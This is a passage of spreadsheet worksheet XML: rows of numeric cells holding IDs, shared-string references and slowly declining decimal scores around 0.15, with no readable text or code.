        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="11316" ht="15.75" customHeight="1">
      <c r="A11316" s="1">
        <v>19582.0</v>
      </c>
      <c r="B11316" s="2">
        <v>5.6154277E7</v>
      </c>
      <c r="C11316" s="2" t="s">
        <v>10852</v>
      </c>
      <c r="D11316" s="2">
        <v>1.0</v>
      </c>
      <c r="E11316" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11316" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="11317" ht="15.75" customHeight="1">
      <c r="A11317" s="1">
        <v>29599.0</v>
      </c>
      <c r="B11317" s="2">
        <v>3.3554951E7</v>
      </c>
      <c r="C11317" s="2" t="s">
        <v>10853</v>
      </c>
      <c r="D11317" s="2">
        <v>1.0</v>
      </c>
      <c r="E11317" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11317" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="11318" ht="15.75" customHeight="1">
      <c r="A11318" s="1">
        <v>23579.0</v>
      </c>
      <c r="B11318" s="2">
        <v>6253508.0</v>
      </c>
      <c r="C11318" s="2" t="s">
        <v>10854</v>
      </c>
      <c r="D11318" s="2">
        <v>1.0</v>
      </c>
      <c r="E11318" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11318" s="2">
        <v>0.1525573192239859</v>
      </c>
    </row>
    <row r="11319" ht="15.75" customHeight="1">
      <c r="A11319" s="1">
        <v>938.0</v>
      </c>
      <c r="B11319" s="2">
        <v>2.2414522E7</v>
      </c>
      <c r="C11319" s="2" t="s">
        <v>10855</v>
      </c>
      <c r="D11319" s="2">
        <v>1.0</v>
      </c>
      <c r="E11319" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11319" s="2">
        <v>0.1523569023569024</v>
      </c>
    </row>
    <row r="11320" ht="15.75" customHeight="1">
      <c r="A11320" s="1">
        <v>17993.0</v>
      </c>
      <c r="B11320" s="2">
        <v>5.1400735E7</v>
      </c>
      <c r="C11320" s="2" t="s">
        <v>10856</v>
      </c>
      <c r="D11320" s="2">
        <v>1.0</v>
      </c>
      <c r="E11320" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11320" s="2">
        <v>0.1522988505747127</v>
      </c>
    </row>
    <row r="11321" ht="15.75" customHeight="1">
      <c r="A11321" s="1">
        <v>8496.0</v>
      </c>
      <c r="B11321" s="2">
        <v>5.404648E7</v>
      </c>
      <c r="C11321" s="2" t="s">
        <v>10857</v>
      </c>
      <c r="D11321" s="2">
        <v>1.0</v>
      </c>
      <c r="E11321" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11321" s="2">
        <v>0.1522366522366523</v>
      </c>
    </row>
    <row r="11322" ht="15.75" customHeight="1">
      <c r="A11322" s="1">
        <v>7943.0</v>
      </c>
      <c r="B11322" s="2">
        <v>5.2621109E7</v>
      </c>
      <c r="C11322" s="2" t="s">
        <v>10858</v>
      </c>
      <c r="D11322" s="2">
        <v>1.0</v>
      </c>
      <c r="E11322" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11322" s="2">
        <v>0.1517412935323384</v>
      </c>
    </row>
    <row r="11323" ht="15.75" customHeight="1">
      <c r="A11323" s="1">
        <v>28220.0</v>
      </c>
      <c r="B11323" s="2">
        <v>2.5057158E7</v>
      </c>
      <c r="C11323" s="2" t="s">
        <v>10829</v>
      </c>
      <c r="D11323" s="2">
        <v>1.0</v>
      </c>
      <c r="E11323" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11323" s="2">
        <v>0.1516007532956686</v>
      </c>
    </row>
    <row r="11324" ht="15.75" customHeight="1">
      <c r="A11324" s="1">
        <v>26033.0</v>
      </c>
      <c r="B11324" s="2">
        <v>1.5434587E7</v>
      </c>
      <c r="C11324" s="2" t="s">
        <v>10859</v>
      </c>
      <c r="D11324" s="2">
        <v>1.0</v>
      </c>
      <c r="E11324" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11324" s="2">
        <v>0.1515873015873016</v>
      </c>
    </row>
    <row r="11325" ht="15.75" customHeight="1">
      <c r="A11325" s="1">
        <v>8832.0</v>
      </c>
      <c r="B11325" s="2">
        <v>5.46573E7</v>
      </c>
      <c r="C11325" s="2" t="s">
        <v>10860</v>
      </c>
      <c r="D11325" s="2">
        <v>1.0</v>
      </c>
      <c r="E11325" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11325" s="2">
        <v>0.1515775034293553</v>
      </c>
    </row>
    <row r="11326" ht="15.75" customHeight="1">
      <c r="A11326" s="1">
        <v>33471.0</v>
      </c>
      <c r="B11326" s="2">
        <v>7973551.0</v>
      </c>
      <c r="C11326" s="2" t="s">
        <v>10861</v>
      </c>
      <c r="D11326" s="2">
        <v>1.0</v>
      </c>
      <c r="E11326" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11326" s="2">
        <v>0.1515775034293553</v>
      </c>
    </row>
    <row r="11327" ht="15.75" customHeight="1">
      <c r="A11327" s="1">
        <v>19221.0</v>
      </c>
      <c r="B11327" s="2">
        <v>5.5025848E7</v>
      </c>
      <c r="C11327" s="2" t="s">
        <v>10862</v>
      </c>
      <c r="D11327" s="2">
        <v>1.0</v>
      </c>
      <c r="E11327" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11327" s="2">
        <v>0.1514459665144597</v>
      </c>
    </row>
    <row r="11328" ht="15.75" customHeight="1">
      <c r="A11328" s="1">
        <v>8210.0</v>
      </c>
      <c r="B11328" s="2">
        <v>5.3309627E7</v>
      </c>
      <c r="C11328" s="2" t="s">
        <v>10863</v>
      </c>
      <c r="D11328" s="2">
        <v>1.0</v>
      </c>
      <c r="E11328" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11328" s="2">
        <v>0.1513888888888889</v>
      </c>
    </row>
    <row r="11329" ht="15.75" customHeight="1">
      <c r="A11329" s="1">
        <v>8117.0</v>
      </c>
      <c r="B11329" s="2">
        <v>5.3080065E7</v>
      </c>
      <c r="C11329" s="2" t="s">
        <v>10864</v>
      </c>
      <c r="D11329" s="2">
        <v>1.0</v>
      </c>
      <c r="E11329" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11329" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="11330" ht="15.75" customHeight="1">
      <c r="A11330" s="1">
        <v>13513.0</v>
      </c>
      <c r="B11330" s="2">
        <v>3.5482616E7</v>
      </c>
      <c r="C11330" s="2" t="s">
        <v>10865</v>
      </c>
      <c r="D11330" s="2">
        <v>1.0</v>
      </c>
      <c r="E11330" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11330" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="11331" ht="15.75" customHeight="1">
      <c r="A11331" s="1">
        <v>16090.0</v>
      </c>
      <c r="B11331" s="2">
        <v>4.5386471E7</v>
      </c>
      <c r="C11331" s="2" t="s">
        <v>10866</v>
      </c>
      <c r="D11331" s="2">
        <v>1.0</v>
      </c>
      <c r="E11331" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11331" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="11332" ht="15.75" customHeight="1">
      <c r="A11332" s="1">
        <v>18003.0</v>
      </c>
      <c r="B11332" s="2">
        <v>5.1427273E7</v>
      </c>
      <c r="C11332" s="2" t="s">
        <v>10867</v>
      </c>
      <c r="D11332" s="2">
        <v>1.0</v>
      </c>
      <c r="E11332" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11332" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="11333" ht="15.75" customHeight="1">
      <c r="A11333" s="1">
        <v>18618.0</v>
      </c>
      <c r="B11333" s="2">
        <v>5.3337014E7</v>
      </c>
      <c r="C11333" s="2" t="s">
        <v>10866</v>
      </c>
      <c r="D11333" s="2">
        <v>1.0</v>
      </c>
      <c r="E11333" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11333" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="11334" ht="15.75" customHeight="1">
      <c r="A11334" s="1">
        <v>6749.0</v>
      </c>
      <c r="B11334" s="2">
        <v>4.9389255E7</v>
      </c>
      <c r="C11334" s="2" t="s">
        <v>10868</v>
      </c>
      <c r="D11334" s="2">
        <v>1.0</v>
      </c>
      <c r="E11334" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11334" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="11335" ht="15.75" customHeight="1">
      <c r="A11335" s="1">
        <v>15597.0</v>
      </c>
      <c r="B11335" s="2">
        <v>4.3478737E7</v>
      </c>
      <c r="C11335" s="2" t="s">
        <v>10869</v>
      </c>
      <c r="D11335" s="2">
        <v>1.0</v>
      </c>
      <c r="E11335" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11335" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="11336" ht="15.75" customHeight="1">
      <c r="A11336" s="1">
        <v>30462.0</v>
      </c>
      <c r="B11336" s="2">
        <v>3.9492736E7</v>
      </c>
      <c r="C11336" s="2" t="s">
        <v>10870</v>
      </c>
      <c r="D11336" s="2">
        <v>1.0</v>
      </c>
      <c r="E11336" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11336" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="11337" ht="15.75" customHeight="1">
      <c r="A11337" s="1">
        <v>5070.0</v>
      </c>
      <c r="B11337" s="2">
        <v>4.4422093E7</v>
      </c>
      <c r="C11337" s="2" t="s">
        <v>10871</v>
      </c>
      <c r="D11337" s="2">
        <v>1.0</v>
      </c>
      <c r="E11337" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11337" s="2">
        <v>0.1506734006734007</v>
      </c>
    </row>
    <row r="11338" ht="15.75" customHeight="1">
      <c r="A11338" s="1">
        <v>9339.0</v>
      </c>
      <c r="B11338" s="2">
        <v>5.5651697E7</v>
      </c>
      <c r="C11338" s="2" t="s">
        <v>10872</v>
      </c>
      <c r="D11338" s="2">
        <v>1.0</v>
      </c>
      <c r="E11338" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11338" s="2">
        <v>0.1503831417624521</v>
      </c>
    </row>
    <row r="11339" ht="15.75" customHeight="1">
      <c r="A11339" s="1">
        <v>6595.0</v>
      </c>
      <c r="B11339" s="2">
        <v>4.899842E7</v>
      </c>
      <c r="C11339" s="2" t="s">
        <v>10873</v>
      </c>
      <c r="D11339" s="2">
        <v>1.0</v>
      </c>
      <c r="E11339" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11339" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="11340" ht="15.75" customHeight="1">
      <c r="A11340" s="1">
        <v>7169.0</v>
      </c>
      <c r="B11340" s="2">
        <v>5.0524674E7</v>
      </c>
      <c r="C11340" s="2" t="s">
        <v>10874</v>
      </c>
      <c r="D11340" s="2">
        <v>1.0</v>
      </c>
      <c r="E11340" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11340" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="11341" ht="15.75" customHeight="1">
      <c r="A11341" s="1">
        <v>8354.0</v>
      </c>
      <c r="B11341" s="2">
        <v>5.375795E7</v>
      </c>
      <c r="C11341" s="2" t="s">
        <v>10875</v>
      </c>
      <c r="D11341" s="2">
        <v>1.0</v>
      </c>
      <c r="E11341" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11341" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="11342" ht="15.75" customHeight="1">
      <c r="A11342" s="1">
        <v>8968.0</v>
      </c>
      <c r="B11342" s="2">
        <v>5.4947853E7</v>
      </c>
      <c r="C11342" s="2" t="s">
        <v>10876</v>
      </c>
      <c r="D11342" s="2">
        <v>1.0</v>
      </c>
      <c r="E11342" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11342" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="11343" ht="15.75" customHeight="1">
      <c r="A11343" s="1">
        <v>10254.0</v>
      </c>
      <c r="B11343" s="2">
        <v>5.7554924E7</v>
      </c>
      <c r="C11343" s="2" t="s">
        <v>10877</v>
      </c>
      <c r="D11343" s="2">
        <v>1.0</v>
      </c>
      <c r="E11343" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11343" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="11344" ht="15.75" customHeight="1">
      <c r="A11344" s="1">
        <v>13264.0</v>
      </c>
      <c r="B11344" s="2">
        <v>3.4328911E7</v>
      </c>
      <c r="C11344" s="2" t="s">
        <v>10878</v>
      </c>
      <c r="D11344" s="2">
        <v>1.0</v>
      </c>
      <c r="E11344" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11344" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="11345" ht="15.75" customHeight="1">
      <c r="A11345" s="1">
        <v>15770.0</v>
      </c>
      <c r="B11345" s="2">
        <v>4.4184276E7</v>
      </c>
      <c r="C11345" s="2" t="s">
        <v>10879</v>
      </c>
      <c r="D11345" s="2">
        <v>1.0</v>
      </c>
      <c r="E11345" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11345" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="11346" ht="15.75" customHeight="1">
      <c r="A11346" s="1">
        <v>24887.0</v>
      </c>
      <c r="B11346" s="2">
        <v>1.2244765E7</v>
      </c>
      <c r="C11346" s="2" t="s">
        <v>10880</v>
      </c>
      <c r="D11346" s="2">
        <v>1.0</v>
      </c>
      <c r="E11346" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11346" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="11347" ht="15.75" customHeight="1">
      <c r="A11347" s="1">
        <v>16576.0</v>
      </c>
      <c r="B11347" s="2">
        <v>4.690673E7</v>
      </c>
      <c r="C11347" s="2" t="s">
        <v>10881</v>
      </c>
      <c r="D11347" s="2">
        <v>1.0</v>
      </c>
      <c r="E11347" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11347" s="2">
        <v>0.1500829187396352</v>
      </c>
    </row>
    <row r="11348" ht="15.75" customHeight="1">
      <c r="A11348" s="1">
        <v>26508.0</v>
      </c>
      <c r="B11348" s="2">
        <v>1.7604699E7</v>
      </c>
      <c r="C11348" s="2" t="s">
        <v>10829</v>
      </c>
      <c r="D11348" s="2">
        <v>1.0</v>
      </c>
      <c r="E11348" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11348" s="2">
        <v>0.1497175141242938</v>
      </c>
    </row>
    <row r="11349" ht="15.75" customHeight="1">
      <c r="A11349" s="1">
        <v>16671.0</v>
      </c>
      <c r="B11349" s="2">
        <v>4.7276002E7</v>
      </c>
      <c r="C11349" s="2" t="s">
        <v>10882</v>
      </c>
      <c r="D11349" s="2">
        <v>1.0</v>
      </c>
      <c r="E11349" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11349" s="2">
        <v>0.1495098039215687</v>
      </c>
    </row>
    <row r="11350" ht="15.75" customHeight="1">
      <c r="A11350" s="1">
        <v>7427.0</v>
      </c>
      <c r="B11350" s="2">
        <v>5.1161837E7</v>
      </c>
      <c r="C11350" s="2" t="s">
        <v>10883</v>
      </c>
      <c r="D11350" s="2">
        <v>1.0</v>
      </c>
      <c r="E11350" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11350" s="2">
        <v>0.1490740740740741</v>
      </c>
    </row>
    <row r="11351" ht="15.75" customHeight="1">
      <c r="A11351" s="1">
        <v>30118.0</v>
      </c>
      <c r="B11351" s="2">
        <v>3.6823117E7</v>
      </c>
      <c r="C11351" s="2" t="s">
        <v>10884</v>
      </c>
      <c r="D11351" s="2">
        <v>1.0</v>
      </c>
      <c r="E11351" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11351" s="2">
        <v>0.1489533011272142</v>
      </c>
    </row>
    <row r="11352" ht="15.75" customHeight="1">
      <c r="A11352" s="1">
        <v>6025.0</v>
      </c>
      <c r="B11352" s="2">
        <v>4.7505943E7</v>
      </c>
      <c r="C11352" s="2" t="s">
        <v>10885</v>
      </c>
      <c r="D11352" s="2">
        <v>1.0</v>
      </c>
      <c r="E11352" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11352" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="11353" ht="15.75" customHeight="1">
      <c r="A11353" s="1">
        <v>16527.0</v>
      </c>
      <c r="B11353" s="2">
        <v>4.6695775E7</v>
      </c>
      <c r="C11353" s="2" t="s">
        <v>10886</v>
      </c>
      <c r="D11353" s="2">
        <v>1.0</v>
      </c>
      <c r="E11353" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11353" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="11354" ht="15.75" customHeight="1">
      <c r="A11354" s="1">
        <v>18321.0</v>
      </c>
      <c r="B11354" s="2">
        <v>5.2398132E7</v>
      </c>
      <c r="C11354" s="2" t="s">
        <v>10887</v>
      </c>
      <c r="D11354" s="2">
        <v>1.0</v>
      </c>
      <c r="E11354" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11354" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="11355" ht="15.75" customHeight="1">
      <c r="A11355" s="1">
        <v>18457.0</v>
      </c>
      <c r="B11355" s="2">
        <v>5.2825263E7</v>
      </c>
      <c r="C11355" s="2" t="s">
        <v>10888</v>
      </c>
      <c r="D11355" s="2">
        <v>1.0</v>
      </c>
      <c r="E11355" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11355" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="11356" ht="15.75" customHeight="1">
      <c r="A11356" s="1">
        <v>18607.0</v>
      </c>
      <c r="B11356" s="2">
        <v>5.3300322E7</v>
      </c>
      <c r="C11356" s="2" t="s">
        <v>10889</v>
      </c>
      <c r="D11356" s="2">
        <v>1.0</v>
      </c>
      <c r="E11356" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11356" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="11357" ht="15.75" customHeight="1">
      <c r="A11357" s="1">
        <v>18616.0</v>
      </c>
      <c r="B11357" s="2">
        <v>5.3337014E7</v>
      </c>
      <c r="C11357" s="2" t="s">
        <v>10890</v>
      </c>
      <c r="D11357" s="2">
        <v>1.0</v>
      </c>
      <c r="E11357" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11357" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="11358" ht="15.75" customHeight="1">
      <c r="A11358" s="1">
        <v>18843.0</v>
      </c>
      <c r="B11358" s="2">
        <v>5.3964585E7</v>
      </c>
      <c r="C11358" s="2" t="s">
        <v>10891</v>
      </c>
      <c r="D11358" s="2">
        <v>1.0</v>
      </c>
      <c r="E11358" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11358" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="11359" ht="15.75" customHeight="1">
      <c r="A11359" s="1">
        <v>19571.0</v>
      </c>
      <c r="B11359" s="2">
        <v>5.6136064E7</v>
      </c>
      <c r="C11359" s="2" t="s">
        <v>10892</v>
      </c>
      <c r="D11359" s="2">
        <v>1.0</v>
      </c>
      <c r="E11359" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11359" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="11360" ht="15.75" customHeight="1">
      <c r="A11360" s="1">
        <v>19581.0</v>
      </c>
      <c r="B11360" s="2">
        <v>5.6154277E7</v>
      </c>
      <c r="C11360" s="2" t="s">
        <v>10893</v>
      </c>
      <c r="D11360" s="2">
        <v>1.0</v>
      </c>
      <c r="E11360" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11360" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="11361" ht="15.75" customHeight="1">
      <c r="A11361" s="1">
        <v>19968.0</v>
      </c>
      <c r="B11361" s="2">
        <v>5.7559587E7</v>
      </c>
      <c r="C11361" s="2" t="s">
        <v>10894</v>
      </c>
      <c r="D11361" s="2">
        <v>1.0</v>
      </c>
      <c r="E11361" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11361" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="11362" ht="15.75" customHeight="1">
      <c r="A11362" s="1">
        <v>25928.0</v>
      </c>
      <c r="B11362" s="2">
        <v>1.5186025E7</v>
      </c>
      <c r="C11362" s="2" t="s">
        <v>10895</v>
      </c>
      <c r="D11362" s="2">
        <v>1.0</v>
      </c>
      <c r="E11362" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11362" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="11363" ht="15.75" customHeight="1">
      <c r="A11363" s="1">
        <v>28523.0</v>
      </c>
      <c r="B11363" s="2">
        <v>2.6756545E7</v>
      </c>
      <c r="C11363" s="2" t="s">
        <v>10896</v>
      </c>
      <c r="D11363" s="2">
        <v>1.0</v>
      </c>
      <c r="E11363" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11363" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="11364" ht="15.75" customHeight="1">
      <c r="A11364" s="1">
        <v>7596.0</v>
      </c>
      <c r="B11364" s="2">
        <v>5.1621557E7</v>
      </c>
      <c r="C11364" s="2" t="s">
        <v>10897</v>
      </c>
      <c r="D11364" s="2">
        <v>1.0</v>
      </c>
      <c r="E11364" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11364" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="11365" ht="15.75" customHeight="1">
      <c r="A11365" s="1">
        <v>5055.0</v>
      </c>
      <c r="B11365" s="2">
        <v>4.4346821E7</v>
      </c>
      <c r="C11365" s="2" t="s">
        <v>10898</v>
      </c>
      <c r="D11365" s="2">
        <v>1.0</v>
      </c>
      <c r="E11365" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11365" s="2">
        <v>0.1483918128654971</v>
      </c>
    </row>
    <row r="11366" ht="15.75" customHeight="1">
      <c r="A11366" s="1">
        <v>15940.0</v>
      </c>
      <c r="B11366" s="2">
        <v>4.4740142E7</v>
      </c>
      <c r="C11366" s="2" t="s">
        <v>10899</v>
      </c>
      <c r="D11366" s="2">
        <v>1.0</v>
      </c>
      <c r="E11366" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11366" s="2">
        <v>0.1478978978978979</v>
      </c>
    </row>
    <row r="11367" ht="15.75" customHeight="1">
      <c r="A11367" s="1">
        <v>10962.0</v>
      </c>
      <c r="B11367" s="2">
        <v>1.7186614E7</v>
      </c>
      <c r="C11367" s="2" t="s">
        <v>10900</v>
      </c>
      <c r="D11367" s="2">
        <v>1.0</v>
      </c>
      <c r="E11367" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11367" s="2">
        <v>0.1478632478632479</v>
      </c>
    </row>
    <row r="11368" ht="15.75" customHeight="1">
      <c r="A11368" s="1">
        <v>5378.0</v>
      </c>
      <c r="B11368" s="2">
        <v>4.5406491E7</v>
      </c>
      <c r="C11368" s="2" t="s">
        <v>10901</v>
      </c>
      <c r="D11368" s="2">
        <v>1.0</v>
      </c>
      <c r="E11368" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11368" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="11369" ht="15.75" customHeight="1">
      <c r="A11369" s="1">
        <v>7646.0</v>
      </c>
      <c r="B11369" s="2">
        <v>5.1779523E7</v>
      </c>
      <c r="C11369" s="2" t="s">
        <v>10902</v>
      </c>
      <c r="D11369" s="2">
        <v>1.0</v>
      </c>
      <c r="E11369" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11369" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="11370" ht="15.75" customHeight="1">
      <c r="A11370" s="1">
        <v>14629.0</v>
      </c>
      <c r="B11370" s="2">
        <v>4.0305905E7</v>
      </c>
      <c r="C11370" s="2" t="s">
        <v>10903</v>
      </c>
      <c r="D11370" s="2">
        <v>1.0</v>
      </c>
      <c r="E11370" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11370" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="11371" ht="15.75" customHeight="1">
      <c r="A11371" s="1">
        <v>4909.0</v>
      </c>
      <c r="B11371" s="2">
        <v>4.3921211E7</v>
      </c>
      <c r="C11371" s="2" t="s">
        <v>10904</v>
      </c>
      <c r="D11371" s="2">
        <v>1.0</v>
      </c>
      <c r="E11371" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11371" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="11372" ht="15.75" customHeight="1">
      <c r="A11372" s="1">
        <v>5743.0</v>
      </c>
      <c r="B11372" s="2">
        <v>4.6626831E7</v>
      </c>
      <c r="C11372" s="2" t="s">
        <v>10905</v>
      </c>
      <c r="D11372" s="2">
        <v>1.0</v>
      </c>
      <c r="E11372" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11372" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="11373" ht="15.75" customHeight="1">
      <c r="A11373" s="1">
        <v>6429.0</v>
      </c>
      <c r="B11373" s="2">
        <v>4.856821E7</v>
      </c>
      <c r="C11373" s="2" t="s">
        <v>10906</v>
      </c>
      <c r="D11373" s="2">
        <v>1.0</v>
      </c>
      <c r="E11373" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11373" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="11374" ht="15.75" customHeight="1">
      <c r="A11374" s="1">
        <v>30333.0</v>
      </c>
      <c r="B11374" s="2">
        <v>3.8138261E7</v>
      </c>
      <c r="C11374" s="2" t="s">
        <v>10907</v>
      </c>
      <c r="D11374" s="2">
        <v>1.0</v>
      </c>
      <c r="E11374" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11374" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="11375" ht="15.75" customHeight="1">
      <c r="A11375" s="1">
        <v>4340.0</v>
      </c>
      <c r="B11375" s="2">
        <v>4.2065087E7</v>
      </c>
      <c r="C11375" s="2" t="s">
        <v>10908</v>
      </c>
      <c r="D11375" s="2">
        <v>1.0</v>
      </c>
      <c r="E11375" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11375" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="11376" ht="15.75" customHeight="1">
      <c r="A11376" s="1">
        <v>28361.0</v>
      </c>
      <c r="B11376" s="2">
        <v>2.6021273E7</v>
      </c>
      <c r="C11376" s="2" t="s">
        <v>10829</v>
      </c>
      <c r="D11376" s="2">
        <v>1.0</v>
      </c>
      <c r="E11376" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11376" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="11377" ht="15.75" customHeight="1">
      <c r="A11377" s="1">
        <v>7964.0</v>
      </c>
      <c r="B11377" s="2">
        <v>5.2690209E7</v>
      </c>
      <c r="C11377" s="2" t="s">
        <v>10909</v>
      </c>
      <c r="D11377" s="2">
        <v>1.0</v>
      </c>
      <c r="E11377" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11377" s="2">
        <v>0.1473429951690822</v>
      </c>
    </row>
    <row r="11378" ht="15.75" customHeight="1">
      <c r="A11378" s="1">
        <v>4336.0</v>
      </c>
      <c r="B11378" s="2">
        <v>4.2064188E7</v>
      </c>
      <c r="C11378" s="2" t="s">
        <v>10910</v>
      </c>
      <c r="D11378" s="2">
        <v>1.0</v>
      </c>
      <c r="E11378" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11378" s="2">
        <v>0.1472222222222223</v>
      </c>
    </row>
    <row r="11379" ht="15.75" customHeight="1">
      <c r="A11379" s="1">
        <v>4012.0</v>
      </c>
      <c r="B11379" s="2">
        <v>4.091784E7</v>
      </c>
      <c r="C11379" s="2" t="s">
        <v>10911</v>
      </c>
      <c r="D11379" s="2">
        <v>1.0</v>
      </c>
      <c r="E11379" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11379" s="2">
        <v>0.1472222222222222</v>
      </c>
    </row>
    <row r="11380" ht="15.75" customHeight="1">
      <c r="A11380" s="1">
        <v>5789.0</v>
      </c>
      <c r="B11380" s="2">
        <v>4.6755984E7</v>
      </c>
      <c r="C11380" s="2" t="s">
        <v>10912</v>
      </c>
      <c r="D11380" s="2">
        <v>1.0</v>
      </c>
      <c r="E11380" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11380" s="2">
        <v>0.1471734892787525</v>
      </c>
    </row>
    <row r="11381" ht="15.75" customHeight="1">
      <c r="A11381" s="1">
        <v>5395.0</v>
      </c>
      <c r="B11381" s="2">
        <v>4.5467433E7</v>
      </c>
      <c r="C11381" s="2" t="s">
        <v>10913</v>
      </c>
      <c r="D11381" s="2">
        <v>1.0</v>
      </c>
      <c r="E11381" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11381" s="2">
        <v>0.147119341563786</v>
      </c>
    </row>
    <row r="11382" ht="15.75" customHeight="1">
      <c r="A11382" s="1">
        <v>5283.0</v>
      </c>
      <c r="B11382" s="2">
        <v>4.5189438E7</v>
      </c>
      <c r="C11382" s="2" t="s">
        <v>10914</v>
      </c>
      <c r="D11382" s="2">
        <v>1.0</v>
      </c>
      <c r="E11382" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F11382" s="2">
